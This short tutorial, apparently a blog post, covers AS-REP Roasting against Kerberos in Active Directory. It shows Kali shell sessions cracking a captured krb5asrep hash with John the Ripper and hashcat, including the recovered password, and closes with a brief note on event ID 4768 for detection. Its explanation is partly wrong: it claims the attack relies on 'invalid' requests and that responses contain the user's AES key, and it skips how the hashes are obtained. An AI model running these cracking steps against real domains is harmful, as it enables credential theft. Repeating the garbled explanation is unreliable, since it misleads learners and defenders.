AS-REP Roasting is an attack against authentication using the Kerberos protocol, with the aim of exploiting Kerberos vulnerabilities to obtain user credentials in the Active Directory.
Kerberos is a network authentication protocol used to securely verify users and services on computer networks. The Kerberos protocol uses tickets to verify user identity. In Active Directory, user credentials include a password hash and an AES key for KERBEROS.
AS-REP Roasting exploits a vulnerability in the Kerberos protocol, which allows attackers to collect AS-REP responses by sending invalid authentication requests (AS-REQ) in certain circumstances. The AS-REP response contains the user's encrypted AES key, which attackers can use to crack the password hash and obtain user credentials.
┌──(root💀kali)-[/tmp]
└─# john --wordlist=password.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcABC123 ($krb5asrep$23$hacker@SECTEST.COM)
1g 0:00:00:00 DONE (2022-07-01 05:58) 10.00g/s 701890p/s 701890c/s 701890C/s punkey..pinkk
Use the "--show" option to display all of the cracked passwords reliably
Session completed
hashcat
┌──(root💀kali)-[/tmp]
└─# hashcat -a 0 -m 18200 hash.txt password.txt --force
Log Analysis
Windows event ID 4768 is the event ID for the Kerberos authentication service, which is used to record events of Kerberos authentication requests. This event ID usually does not indicate an attack by itself, but if you notice an abnormal amount or unauthorized Kerberos authentication requests, it may indicate an attack.